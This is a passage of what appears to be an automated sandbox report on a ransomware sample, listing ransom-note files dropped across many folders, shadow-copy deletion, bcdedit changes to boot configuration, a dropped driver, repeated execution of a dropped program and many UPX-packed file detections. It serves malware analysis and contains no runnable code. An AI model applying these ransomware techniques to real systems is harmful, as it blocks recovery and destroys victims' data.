d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Links\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\permanent\chrome\idb\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Downloads\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1948 bcdedit.exe 756 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS IhR8G8EE64.exe -
Executes dropped EXE 359 IoCs
pid Process 1888 NWwlXAMT.exe 1964 IhR8G8EE.exe 1060 IhR8G8EE64.exe 1484 IhR8G8EE.exe 732 IhR8G8EE.exe 1896 IhR8G8EE.exe 1888 IhR8G8EE.exe 928 IhR8G8EE.exe 1052 IhR8G8EE.exe 1772 IhR8G8EE.exe 1632 IhR8G8EE.exe 484 IhR8G8EE.exe 1804 IhR8G8EE.exe 1512 IhR8G8EE.exe 1128 IhR8G8EE.exe 1772 IhR8G8EE.exe 1936 IhR8G8EE.exe 1412 IhR8G8EE.exe 548 IhR8G8EE.exe 1752 IhR8G8EE.exe 1404 IhR8G8EE.exe 1632 IhR8G8EE.exe 1948 IhR8G8EE.exe 1236 IhR8G8EE.exe 916 IhR8G8EE.exe 1632 IhR8G8EE.exe 1132 IhR8G8EE.exe 1236 IhR8G8EE.exe 1404 IhR8G8EE.exe 1632 IhR8G8EE.exe 1840 IhR8G8EE.exe 1804 IhR8G8EE.exe 916 IhR8G8EE.exe 756 IhR8G8EE.exe 1028 IhR8G8EE.exe 484 IhR8G8EE.exe 1080 IhR8G8EE.exe 1892 IhR8G8EE.exe 1912 IhR8G8EE.exe 972 IhR8G8EE.exe 1984 IhR8G8EE.exe 1892 IhR8G8EE.exe 1696 IhR8G8EE.exe 1412 IhR8G8EE.exe 224 IhR8G8EE.exe 928 IhR8G8EE.exe 864 IhR8G8EE.exe 216 IhR8G8EE.exe 2016 IhR8G8EE.exe 1376 IhR8G8EE.exe 232 IhR8G8EE.exe 1788 IhR8G8EE.exe 1080 IhR8G8EE.exe 932 IhR8G8EE.exe 1404 IhR8G8EE.exe 864 IhR8G8EE.exe 1936 IhR8G8EE.exe 1780 IhR8G8EE.exe 1752 IhR8G8EE.exe 212 IhR8G8EE.exe 204 IhR8G8EE.exe 1080 IhR8G8EE.exe 680 IhR8G8EE.exe 916 IhR8G8EE.exe 1864 IhR8G8EE.exe 864 IhR8G8EE.exe 848 IhR8G8EE.exe 292 IhR8G8EE.exe 224 IhR8G8EE.exe 1096 IhR8G8EE.exe 300 IhR8G8EE.exe 1960 IhR8G8EE.exe 928 IhR8G8EE.exe 232 IhR8G8EE.exe 1804 IhR8G8EE.exe 1896 IhR8G8EE.exe 1840 IhR8G8EE.exe 932 IhR8G8EE.exe 896 IhR8G8EE.exe 1864 IhR8G8EE.exe 1608 IhR8G8EE.exe 1468 IhR8G8EE.exe 1412 IhR8G8EE.exe 960 IhR8G8EE.exe 1168 IhR8G8EE.exe 468 IhR8G8EE.exe 964 IhR8G8EE.exe 1344 IhR8G8EE.exe 1908 IhR8G8EE.exe 236 IhR8G8EE.exe 380 IhR8G8EE.exe 548 IhR8G8EE.exe 1580 IhR8G8EE.exe 1908 IhR8G8EE.exe 864 IhR8G8EE.exe 900 IhR8G8EE.exe 1752 IhR8G8EE.exe 1864 IhR8G8EE.exe 1756 IhR8G8EE.exe 1960 IhR8G8EE.exe 1080 IhR8G8EE.exe 1984 IhR8G8EE.exe 1888 IhR8G8EE.exe 228 IhR8G8EE.exe 300 IhR8G8EE.exe 1404 IhR8G8EE.exe 1948 IhR8G8EE.exe 1888 IhR8G8EE.exe 280 IhR8G8EE.exe 300 IhR8G8EE.exe 940 IhR8G8EE.exe 236 IhR8G8EE.exe 864 IhR8G8EE.exe 1028 IhR8G8EE.exe 1752 IhR8G8EE.exe 680 IhR8G8EE.exe 1376 IhR8G8EE.exe 1808 IhR8G8EE.exe 1512 IhR8G8EE.exe 1204 IhR8G8EE.exe 1984 IhR8G8EE.exe 916 IhR8G8EE.exe 1468 IhR8G8EE.exe 1128 IhR8G8EE.exe 296 IhR8G8EE.exe 972 IhR8G8EE.exe 1888 IhR8G8EE.exe 1564 IhR8G8EE.exe 1416 IhR8G8EE.exe 1420 IhR8G8EE.exe 1948 IhR8G8EE.exe 1936 IhR8G8EE.exe 1028 IhR8G8EE.exe 1580 IhR8G8EE.exe 484 IhR8G8EE.exe 236 IhR8G8EE.exe 1840 IhR8G8EE.exe 548 IhR8G8EE.exe 1912 IhR8G8EE.exe 1860 IhR8G8EE.exe 756 IhR8G8EE.exe 1892 IhR8G8EE.exe 1080 IhR8G8EE.exe 1608 IhR8G8EE.exe 964 IhR8G8EE.exe 228 IhR8G8EE.exe 1168 IhR8G8EE.exe 1808 IhR8G8EE.exe 1512 IhR8G8EE.exe 204 IhR8G8EE.exe 232 IhR8G8EE.exe 1344 IhR8G8EE.exe 1580 IhR8G8EE.exe 900 IhR8G8EE.exe 224 IhR8G8EE.exe 1372 IhR8G8EE.exe 208 IhR8G8EE.exe 1324 IhR8G8EE.exe 1756 IhR8G8EE.exe 2016 IhR8G8EE.exe 1840 IhR8G8EE.exe 300 IhR8G8EE.exe 1108 IhR8G8EE.exe 1896 IhR8G8EE.exe 1376 IhR8G8EE.exe 468 IhR8G8EE.exe 296 IhR8G8EE.exe 1888 IhR8G8EE.exe 204 IhR8G8EE.exe 1416 IhR8G8EE.exe 940 IhR8G8EE.exe 296 IhR8G8EE.exe 900 IhR8G8EE.exe 896 IhR8G8EE.exe 1780 IhR8G8EE.exe 940 IhR8G8EE.exe 944 IhR8G8EE.exe 548 IhR8G8EE.exe 1804 IhR8G8EE.exe 1324 IhR8G8EE.exe 972 IhR8G8EE.exe 236 IhR8G8EE.exe 228 IhR8G8EE.exe 1804 IhR8G8EE.exe 216 IhR8G8EE.exe 1028 IhR8G8EE.exe 280 IhR8G8EE.exe 228 IhR8G8EE.exe 1376 IhR8G8EE.exe 680 IhR8G8EE.exe 232 IhR8G8EE.exe 1752 IhR8G8EE.exe 1468 IhR8G8EE.exe 1416 IhR8G8EE.exe 968 IhR8G8EE.exe 232 IhR8G8EE.exe 1808 IhR8G8EE.exe 1372 IhR8G8EE.exe 1324 IhR8G8EE.exe 968 IhR8G8EE.exe 236 IhR8G8EE.exe 1800 IhR8G8EE.exe 1804 IhR8G8EE.exe 1168 IhR8G8EE.exe 1028 IhR8G8EE.exe 1236 IhR8G8EE.exe 228 IhR8G8EE.exe 964 IhR8G8EE.exe 220 IhR8G8EE.exe 1028 IhR8G8EE.exe 1260 IhR8G8EE.exe 1840 IhR8G8EE.exe 1404 IhR8G8EE.exe 1204 IhR8G8EE.exe 1780 IhR8G8EE.exe 1260 IhR8G8EE.exe 1468 IhR8G8EE.exe 1404 IhR8G8EE.exe 900 IhR8G8EE.exe 1780 IhR8G8EE.exe 1772 IhR8G8EE.exe 208 IhR8G8EE.exe 1820 IhR8G8EE.exe 1816 IhR8G8EE.exe 1428 IhR8G8EE.exe 220 IhR8G8EE.exe 296 IhR8G8EE.exe 1820 IhR8G8EE.exe 1028 IhR8G8EE.exe 300 IhR8G8EE.exe 204 IhR8G8EE.exe 940 IhR8G8EE.exe 1108 IhR8G8EE.exe 1404 IhR8G8EE.exe 1344 IhR8G8EE.exe 756 IhR8G8EE.exe 1896 IhR8G8EE.exe 944 IhR8G8EE.exe 1780 IhR8G8EE.exe 1808 IhR8G8EE.exe 928 IhR8G8EE.exe 1752 IhR8G8EE.exe 1080 IhR8G8EE.exe 548 IhR8G8EE.exe 1904 IhR8G8EE.exe 1528 IhR8G8EE.exe 848 IhR8G8EE.exe 524 IhR8G8EE.exe 300 IhR8G8EE.exe 1376 IhR8G8EE.exe 1756 IhR8G8EE.exe 1416 IhR8G8EE.exe 1404 IhR8G8EE.exe 1372 IhR8G8EE.exe 932 IhR8G8EE.exe 296 IhR8G8EE.exe 944 IhR8G8EE.exe 208 IhR8G8EE.exe 1896 IhR8G8EE.exe 900 IhR8G8EE.exe 964 IhR8G8EE.exe 548 IhR8G8EE.exe 1984 IhR8G8EE.exe 1236 IhR8G8EE.exe 524 IhR8G8EE.exe 756 IhR8G8EE.exe 220 IhR8G8EE.exe 1772 IhR8G8EE.exe 204 IhR8G8EE.exe 1468 IhR8G8EE.exe 1936 IhR8G8EE.exe 220 IhR8G8EE.exe 1424 IhR8G8EE.exe 1128 IhR8G8EE.exe 1204 IhR8G8EE.exe 280 IhR8G8EE.exe 1904 IhR8G8EE.exe 1912 IhR8G8EE.exe 928 IhR8G8EE.exe 968 IhR8G8EE.exe 292 IhR8G8EE.exe 1096 IhR8G8EE.exe 1168 IhR8G8EE.exe 1840 IhR8G8EE.exe 964 IhR8G8EE.exe 1404 IhR8G8EE.exe 208 IhR8G8EE.exe 1168 IhR8G8EE.exe 1948 IhR8G8EE.exe 1376 IhR8G8EE.exe 300 IhR8G8EE.exe 1344 IhR8G8EE.exe 1800 IhR8G8EE.exe 484 IhR8G8EE.exe 1904 IhR8G8EE.exe 944 IhR8G8EE.exe 848 IhR8G8EE.exe 380 IhR8G8EE.exe 968 IhR8G8EE.exe 756 IhR8G8EE.exe 1096 IhR8G8EE.exe 1912 IhR8G8EE.exe 1080 IhR8G8EE.exe 1892 IhR8G8EE.exe 1404 IhR8G8EE.exe 1788 IhR8G8EE.exe 1804 IhR8G8EE.exe 1080 IhR8G8EE.exe 1376 IhR8G8EE.exe 1404 IhR8G8EE.exe 224 IhR8G8EE.exe 484 IhR8G8EE.exe 1424 IhR8G8EE.exe 928 IhR8G8EE.exe 864 IhR8G8EE.exe 1896 IhR8G8EE.exe 940 IhR8G8EE.exe 216 IhR8G8EE.exe 1204 IhR8G8EE.exe 864 IhR8G8EE.exe 1912 IhR8G8EE.exe 1096 IhR8G8EE.exe 900 IhR8G8EE.exe 232 IhR8G8EE.exe 1876 IhR8G8EE.exe 228 IhR8G8EE.exe 1528 IhR8G8EE.exe 900 IhR8G8EE.exe 1756 IhR8G8EE.exe 1772 IhR8G8EE.exe 916 IhR8G8EE.exe 1528 IhR8G8EE.exe 968 IhR8G8EE.exe 484 IhR8G8EE.exe 932 IhR8G8EE.exe 1984 IhR8G8EE.exe 216 IhR8G8EE.exe 1260 IhR8G8EE.exe 864 IhR8G8EE.exe 932 IhR8G8EE.exe 1168 IhR8G8EE.exe 216 IhR8G8EE.exe 1080 IhR8G8EE.exe 1428 IhR8G8EE.exe 220 IhR8G8EE.exe 1168 IhR8G8EE.exe 1804 IhR8G8EE.exe 1080 IhR8G8EE.exe 468 IhR8G8EE.exe 1936 IhR8G8EE.exe 1904 IhR8G8EE.exe 1780 IhR8G8EE.exe 1128 IhR8G8EE.exe 1984 IhR8G8EE.exe 944 IhR8G8EE.exe 1800 IhR8G8EE.exe 1168 IhR8G8EE.exe 1324 IhR8G8EE.exe 928 IhR8G8EE.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\UnpublishOpen.tiff d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00030000000131b4-18.dat upx behavioral1/files/0x00030000000131b4-19.dat upx behavioral1/files/0x00030000000131b4-22.dat upx behavioral1/files/0x00030000000131b4-35.dat upx behavioral1/files/0x00030000000131b4-37.dat upx behavioral1/files/0x00030000000131b4-38.dat upx behavioral1/files/0x00030000000131b4-40.dat upx behavioral1/files/0x00030000000131b4-45.dat upx behavioral1/files/0x00030000000131b4-47.dat upx behavioral1/files/0x00030000000131b4-48.dat upx behavioral1/files/0x00030000000131b4-50.dat upx behavioral1/files/0x00030000000131b4-55.dat upx behavioral1/files/0x00030000000131b4-57.dat upx behavioral1/files/0x00030000000131b4-58.dat upx behavioral1/files/0x00030000000131b4-60.dat upx behavioral1/files/0x00030000000131b4-66.dat upx behavioral1/files/0x00030000000131b4-68.dat upx behavioral1/files/0x00030000000131b4-69.dat upx behavioral1/files/0x00030000000131b4-71.dat upx behavioral1/files/0x00030000000131b4-77.dat upx behavioral1/files/0x00030000000131b4-79.dat upx behavioral1/files/0x00030000000131b4-80.dat upx behavioral1/files/0x00030000000131b4-82.dat upx behavioral1/files/0x00030000000131b4-87.dat upx behavioral1/files/0x00030000000131b4-89.dat upx behavioral1/files/0x00030000000131b4-90.dat upx behavioral1/files/0x00030000000131b4-92.dat upx behavioral1/files/0x00030000000131b4-97.dat upx behavioral1/files/0x00030000000131b4-99.dat upx behavioral1/files/0x00030000000131b4-100.dat upx behavioral1/files/0x00030000000131b4-102.dat upx behavioral1/files/0x00030000000131b4-107.dat upx behavioral1/files/0x00030000000131b4-109.dat upx behavioral1/files/0x00030000000131b4-111.dat upx behavioral1/files/0x00030000000131b4-113.dat upx behavioral1/files/0x00030000000131b4-118.dat upx behavioral1/files/0x00030000000131b4-120.dat upx behavioral1/files/0x00030000000131b4-121.dat upx behavioral1/files/0x00030000000131b4-123.dat upx behavioral1/files/0x00030000000131b4-128.dat upx behavioral1/files/0x00030000000131b4-130.dat upx behavioral1/files/0x00030000000131b4-131.dat upx behavioral1/files/0x00030000000131b4-133.dat upx behavioral1/files/0x00030000000131b4-138.dat upx behavioral1/files/0x00030000000131b4-140.dat upx behavioral1/files/0x00030000000131b4-141.dat upx behavioral1/files/0x00030000000131b4-143.dat upx behavioral1/files/0x00030000000131b4-148.dat upx behavioral1/files/0x00030000000131b4-150.dat upx behavioral1/files/0x00030000000131b4-151.dat upx behavioral1/files/0x00030000000131b4-153.dat upx behavioral1/files/0x00030000000131b4-158.dat upx behavioral1/files/0x00030000000131b4-160.dat upx behavioral1/files/0x00030000000131b4-161.dat upx behavioral1/files/0x00030000000131b4-163.dat upx behavioral1/files/0x00030000000131b4-168.dat upx behavioral1/files/0x00030000000131b4-170.dat upx behavioral1/files/0x00030000000131b4-171.dat upx behavioral1/files/0x00030000000131b4-173.dat upx behavioral1/files/0x00030000000131b4-178.dat upx behavioral1/files/0x00030000000131b4-180.dat upx behavioral1/files/0x00030000000131b4-181.dat upx behavioral1/files/0x00030000000131b4-183.dat upx behavioral1/files/0x00030000000131b4-188.dat upx behavioral1/files/0x00030000000131b4-190.dat upx behavioral1/files/0x00030000000131b4-191.dat upx behavioral1/files/0x00030000000131b4-193.dat upx behavioral1/files/0x00030000000131b4-198.dat upx behavioral1/files/0x00030000000131b4-200.dat upx behavioral1/files/0x00030000000131b4-201.dat upx behavioral1/files/0x00030000000131b4-203.dat upx behavioral1/files/0x00030000000131b4-209.dat upx behavioral1/files/0x00030000000131b4-211.dat upx behavioral1/files/0x00030000000131b4-212.dat upx behavioral1/files/0x00030000000131b4-214.dat upx behavioral1/files/0x00030000000131b4-219.dat upx behavioral1/files/0x00030000000131b4-221.dat upx behavioral1/files/0x00030000000131b4-222.dat upx behavioral1/files/0x00030000000131b4-224.dat upx behavioral1/files/0x00030000000131b4-230.dat upx behavioral1/files/0x00030000000131b4-233.dat upx behavioral1/files/0x00030000000131b4-234.dat upx behavioral1/files/0x00030000000131b4-236.dat upx behavioral1/files/0x00030000000131b4-241.dat upx behavioral1/files/0x00030000000131b4-243.dat upx behavioral1/files/0x00030000000131b4-244.dat upx behavioral1/files/0x00030000000131b4-246.dat upx behavioral1/files/0x00030000000131b4-251.dat upx behavioral1/files/0x00030000000131b4-253.dat upx behavioral1/files/0x00030000000131b4-254.dat upx behavioral1/files/0x00030000000131b4-256.dat upx behavioral1/files/0x00030000000131b4-261.dat upx behavioral1/files/0x00030000000131b4-263.dat upx behavioral1/files/0x00030000000131b4-264.dat upx behavioral1/files/0x00030000000131b4-266.dat upx behavioral1/files/0x00030000000131b4-271.dat upx behavioral1/files/0x00030000000131b4-273.dat upx behavioral1/files/0x00030000000131b4-274.dat upx behavioral1/files/0x00030000000131b4-276.dat upx behavioral1/files/0x00030000000131b4-281.dat upx behavioral1/files/0x00030000000131b4-283.dat upx behavioral1/files/0x00030000000131b4-284.dat upx behavioral1/files/0x00030000000131b4-286.dat upx behavioral1/files/0x00030000000131b4-291.dat upx behavioral1/files/0x00030000000131b4-293.dat upx behavioral1/files/0x00030000000131b4-294.dat upx behavioral1/files/0x00030000000131b4-296.dat upx behavioral1/files/0x00030000000131b4-301.dat upx behavioral1/files/0x00030000000131b4-303.dat upx behavioral1/files/0x00030000000131b4-304.dat upx behavioral1/files/0x00030000000131b4-306.dat upx behavioral1/files/0x00030000000131b4-311.dat upx behavioral1/files/0x00030000000131b4-313.dat upx behavioral1/files/0x00030000000131b4-314.dat upx behavioral1/files/0x00030000000131b4-316.dat upx behavioral1/files/0x00030000000131b4-321.dat upx behavioral1/files/0x00030000000131b4-323.dat upx behavioral1/files/0x00030000000131b4-324.dat upx behavioral1/files/0x00030000000131b4-326.dat upx behavioral1/files/0x00030000000131b4-331.dat upx behavioral1/files/0x00030000000131b4-333.dat upx behavioral1/files/0x00030000000131b4-334.dat upx behavioral1/files/0x00030000000131b4-336.dat upx behavioral1/files/0x00030000000131b4-341.dat upx behavioral1/files/0x00030000000131b4-343.dat upx behavioral1/files/0x00030000000131b4-344.dat upx behavioral1/files/0x00030000000131b4-346.dat upx behavioral1/files/0x00030000000131b4-351.dat upx behavioral1/files/0x00030000000131b4-353.dat upx behavioral1/files/0x00030000000131b4-354.dat upx behavioral1/files/0x00030000000131b4-356.dat upx behavioral1/files/0x00030000000131b4-361.dat upx behavioral1/files/0x00030000000131b4-363.dat upx behavioral1/files/0x00030000000131b4-364.dat upx behavioral1/files/0x00030000000131b4-366.dat upx behavioral1/files/0x00030000000131b4-371.dat upx behavioral1/files/0x00030000000131b4-373.dat upx behavioral1/files/0x00030000000131b4-374.dat upx behavioral1/files/0x00030000000131b4-376.dat upx behavioral1/files/0x00030000000131b4-381.dat upx behavioral1/files/0x00030000000131b4-383.dat upx behavioral1/files/0x00030000000131b4-384.dat upx behavioral1/files/0x00030000000131b4-386.dat upx behavioral1/files/0x00030000000131b4-391.dat upx behavioral1/files/0x00030000000131b4-393.dat upx behavioral1/files/0x00030000000131b4-394.dat upx behavioral1/files/0x00030000000131b4-396.dat upx behavioral1/files/0x00030000000131b4-401.dat upx behavioral1/files/0x00030000000131b4-403.dat upx behavioral1/files/0x00030000000131b4-404.dat upx behavioral1/files/0x00030000000131b4-406.dat upx behavioral1/files/0x00030000000131b4-411.dat upx behavioral1/files/0x00030000000131b4-413.dat upx behavioral1/files/0x00030000000131b4-414.dat upx behavioral1/files/0x00030000000131b4-416.dat upx behavioral1/files/0x00030000000131b4-421.dat upx behavioral1/files/0x00030000000131b4-423.dat upx behavioral1/files/0x00030000000131b4-424.dat upx behavioral1/files/0x00030000000131b4-426.dat upx behavioral1/files/0x00030000000131b4-431.dat upx behavioral1/files/0x00030000000131b4-433.dat upx behavioral1/files/0x00030000000131b4-434.dat upx behavioral1/files/0x00030000000131b4-436.dat upx behavioral1/files/0x00030000000131b4-441.dat upx behavioral1/files/0x00030000000131b4-443.dat upx behavioral1/files/0x00030000000131b4-444.dat upx behavioral1/files/0x00030000000131b4-446.dat upx behavioral1/files/0x00030000000131b4-451.dat upx behavioral1/files/0x00030000000131b4-453.dat upx behavioral1/files/0x00030000000131b4-454.dat upx behavioral1/files/0x00030000000131b4-456.dat upx behavioral1/files/0x00030000000131b4-461.dat upx behavioral1/files/0x00030000000131b4-463.dat upx behavioral1/files/0x00030000000131b4-464.dat upx behavioral1/files/0x00030000000131b4-466.dat upx behavioral1/files/0x00030000000131b4-471.dat upx behavioral1/files/0x00030000000131b4-473.dat upx behavioral1/files/0x00030000000131b4-474.dat upx behavioral1/files/0x00030000000131b4-476.dat upx behavioral1/files/0x00030000000131b4-481.dat upx behavioral1/files/0x00030000000131b4-483.dat upx behavioral1/files/0x00030000000131b4-484.dat upx behavioral1/files/0x00030000000131b4-486.dat upx behavioral1/files/0x00030000000131b4-491.dat upx behavioral1/files/0x00030000000131b4-493.dat upx behavioral1/files/0x00030000000131b4-494.dat upx behavioral1/files/0x00030000000131b4-496.dat upx behavioral1/files/0x00030000000131b4-501.dat upx behavioral1/files/0x00030000000131b4-503.dat upx behavioral1/files/0x00030000000131b4-504.dat upx behavioral1/files/0x00030000000131b4-506.dat upx behavioral1/files/0x00030000000131b4-511.dat upx behavioral1/files/0x00030000000131b4-513.dat upx behavioral1/files/0x00030000000131b4-514.dat upx behavioral1/files/0x00030000000131b4-516.dat upx behavioral1/files/0x00030000000131b4-521.dat upx behavioral1/files/0x00030000000131b4-523.dat upx behavioral1/files/0x00030000000131b4-524.dat upx behavioral1/files/0x00030000000131b4-526.dat upx behavioral1/files/0x00030000000131b4-531.dat upx behavioral1/files/0x00030000000131b4-533.dat upx behavioral1/files/0x00030000000131b4-534.dat upx behavioral1/files/0x00030000000131b4-536.dat upx behavioral1/files/0x00030000000131b4-541.dat upx behavioral1/files/0x00030000000131b4-543.dat upx behavioral1/files/0x00030000000131b4-544.dat upx behavioral1/files/0x00030000000131b4-546.dat upx behavioral1/files/0x00030000000131b4-551.dat upx behavioral1/files/0x00030000000131b4-553.dat upx behavioral1/files/0x00030000000131b4-554.dat upx behavioral1/files/0x00030000000131b4-556.dat upx behavioral1/files/0x00030000000131b4-561.dat upx behavioral1/files/0x00030000000131b4-563.dat upx behavioral1/files/0x00030000000131b4-564.dat upx behavioral1/files/0x00030000000131b4-566.dat upx behavioral1/files/0x00030000000131b4-571.dat upx behavioral1/files/0x00030000000131b4-573.dat upx behavioral1/files/0x00030000000131b4-574.dat upx behavioral1/files/0x00030000000131b4-576.dat upx behavioral1/files/0x00030000000131b4-581.dat upx behavioral1/files/0x00030000000131b4-583.dat upx behavioral1/files/0x00030000000131b4-584.dat upx behavioral1/files/0x00030000000131b4-586.dat upx behavioral1/files/0x00030000000131b4-591.dat upx behavioral1/files/0x00030000000131b4-593.dat upx behavioral1/files/0x00030000000131b4-594.dat upx behavioral1/files/0x00030000000131b4-596.dat upx behavioral1/files/0x00030000000131b4-601.dat upx behavioral1/files/0x00030000000131b4-603.dat upx behavioral1/files/0x00030000000131b4-604.dat upx behavioral1/files/0x00030000000131b4-606.dat upx behavioral1/files/0x00030000000131b4-611.dat upx behavioral1/files/0x00030000000131b4-613.dat upx behavioral1/files/0x00030000000131b4-614.dat upx behavioral1/files/0x00030000000131b4-616.dat upx behavioral1/files/0x00030000000131b4-621.dat upx behavioral1/files/0x00030000000131b4-623.dat upx behavioral1/files/0x00030000000131b4-624.dat upx behavioral1/files/0x00030000000131b4-626.dat upx behavioral1/files/0x00030000000131b4-631.dat upx behavioral1/files/0x00030000000131b4-633.dat upx behavioral1/files/0x00030000000131b4-634.dat upx behavioral1/files/0x00030000000131b4-636.dat upx behavioral1/files/0x00030000000131b4-641.dat upx behavioral1/files/0x00030000000131b4-643.dat upx behavioral1/files/0x00030000000131b4-644.dat upx behavioral1/files/0x00030000000131b4-646.dat upx behavioral1/files/0x00030000000131b4-651.dat upx behavioral1/files/0x00030000000131b4-653.dat upx behavioral1/files/0x00030000000131b4-654.dat upx behavioral1/files/0x00030000000131b4-656.dat upx behavioral1/files/0x00030000000131b4-661.dat upx behavioral1/files/0x00030000000131b4-663.dat upx behavioral1/files/0x00030000000131b4-664.dat upx behavioral1/files/0x00030000000131b4-666.dat upx behavioral1/files/0x00030000000131b4-671.dat upx behavioral1/files/0x00030000000131b4-673.dat upx behavioral1/files/0x00030000000131b4-674.dat upx behavioral1/files/0x00030000000131b4-676.dat upx behavioral1/files/0x00030000000131b4-681.dat upx behavioral1/files/0x00030000000131b4-683.dat upx behavioral1/files/0x00030000000131b4-684.dat upx behavioral1/files/0x00030000000131b4-686.dat upx behavioral1/files/0x00030000000131b4-691.dat upx behavioral1/files/0x00030000000131b4-693.dat upx behavioral1/files/0x00030000000131b4-694.dat upx behavioral1/files/0x00030000000131b4-696.dat upx behavioral1/files/0x00030000000131b4-701.dat upx behavioral1/files/0x00030000000131b4-703.dat upx behavioral1/files/0x00030000000131b4-704.dat upx behavioral1/files/0x00030000000131b4-706.dat upx behavioral1/files/0x00030000000131b4-711.dat upx behavioral1/files/0x00030000000131b4-713.dat upx behavioral1/files/0x00030000000131b4-714.dat upx behavioral1/files/0x00030000000131b4-716.dat upx behavioral1/files/0x00030000000131b4-721.dat upx behavioral1/files/0x00030000000131b4-723.dat upx behavioral1/files/0x00030000000131b4-724.dat upx behavioral1/files/0x00030000000131b4-726.dat upx behavioral1/files/0x00030000000131b4-731.dat upx behavioral1/files/0x00030000000131b4-733.dat upx behavioral1/files/0x00030000000131b4-734.dat upx behavioral1/files/0x00030000000131b4-736.dat upx behavioral1/files/0x00030000000131b4-741.dat upx behavioral1/files/0x00030000000131b4-743.dat upx behavioral1/files/0x00030000000131b4-744.dat upx behavioral1/files/0x00030000000131b4-746.dat upx behavioral1/files/0x00030000000131b4-751.dat upx behavioral1/files/0x00030000000131b4-753.dat upx behavioral1/files/0x00030000000131b4-754.dat upx behavioral1/files/0x00030000000131b4-756.dat upx behavioral1/files/0x00030000000131b4-761.dat upx behavioral1/files/0x00030000000131b4-763.dat upx behavioral1/files/0x00030000000131b4-764.dat upx behavioral1/files/0x00030000000131b4-766.dat upx behavioral1/files/0x00030000000131b4-771.dat upx behavioral1/files/0x00030000000131b4-773.dat upx behavioral1/files/0x00030000000131b4-774.dat upx behavioral1/files/0x00030000000131b4-776.dat upx behavioral1/files/0x00030000000131b4-781.dat upx behavioral1/files/0x00030000000131b4-783.dat upx behavioral1/files/0x00030000000131b4-784.dat upx behavioral1/files/0x00030000000131b4-786.dat upx behavioral1/files/0x00030000000131b4-791.dat upx behavioral1/files/0x00030000000131b4-793.dat upx behavioral1/files/0x00030000000131b4-794.dat upx behavioral1/files/0x00030000000131b4-796.dat upx behavioral1/files/0x00030000000131b4-801.dat upx behavioral1/files/0x00030000000131b4-803.dat upx behavioral1/files/0x00030000000131b4-804.dat upx behavioral1/files/0x00030000000131b4-806.dat upx behavioral1/files/0x00030000000131b4-811.dat upx behavioral1/files/0x00030000000131b4-813.dat upx behavioral1/files/0x00030000000131b4-814.dat upx behavioral1/files/0x00030000000131b4-816.dat upx behavioral1/files/0x00030000000131b4-821.dat upx behavioral1/files/0x00030000000131b4-823.dat upx behavioral1/files/0x00030000000131b4-824.dat upx 